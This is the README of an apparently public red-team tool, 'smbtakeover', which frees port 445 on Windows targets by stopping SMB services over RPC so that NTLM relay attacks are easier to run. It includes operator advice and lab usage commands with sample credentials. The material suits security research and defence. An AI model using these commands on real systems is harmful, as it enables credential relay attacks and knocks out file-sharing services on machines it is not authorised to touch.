A technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. Technical analysis of the technique is dicussed in more detail during the Relay Your Heart Away: An OPSEC Concious Approach to 445 Takeover presentation at x33fcon.
PoCs written in both Python and BOF format. Both utilize RPC over TCP (ncacn_ip_tcp) as transport when targeting remote machines.
Please see Operations Usage section of the associated blog post for an overview of considerations. The highlights include:
- Disabling these services effectively disables the target's ability to leverage namedpipes and and the server-side of SMB-based communication (CIFS, etc). Understand what the target machine is used for, especially if the target is critical / production infrastructure. The services will resume normal functionality once re-enabled.
- Occasionally there is slightly different series of services that need to be disabled. I've seen this occur in some version of Windows Server, as well as if certain third-party networking drivers are installed. This won't prevent you from using this technique. You can enumerate service dependencies backwards from
srvnetand see if there are additional dependents to consider. - You don't have to use this PoC to abuse this technique! Your favorite tool to interact with service control manager (SCM) should work.
- Make sure you understand if the tool of your choice leverages
ncacn_ip_tcporncacn_npas transport for RPC. If it uses the latter (named pipes) then you won't be able to communicate remotely with the target to re-enable.
- Make sure you understand if the tool of your choice leverages
Create a Python virtual environment and pip install impacket.
git clone https://github.com/zyn3rgy/smbtakeover.gitcd smbtakeoverpython3 -m virtualenv venvsource venv/bin/activatepython3 -m pip install impacketpython3 smbtakeover.py -h
python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 checkpython3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 stoppython3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 start
smbtakeover localhost checksmbtakeover 10.0.0.21 stopsmbtakeover localhost start
- Python implementation is heavily based on the wmiexec-Pro project by @Memory_before
- BOF implementation is heavily based on code within the CS-Remote-OPs-BOF repository, such as sc_config, from the great folks at @TrustedSec
- BOF makes use of the bof-vs template from Fortra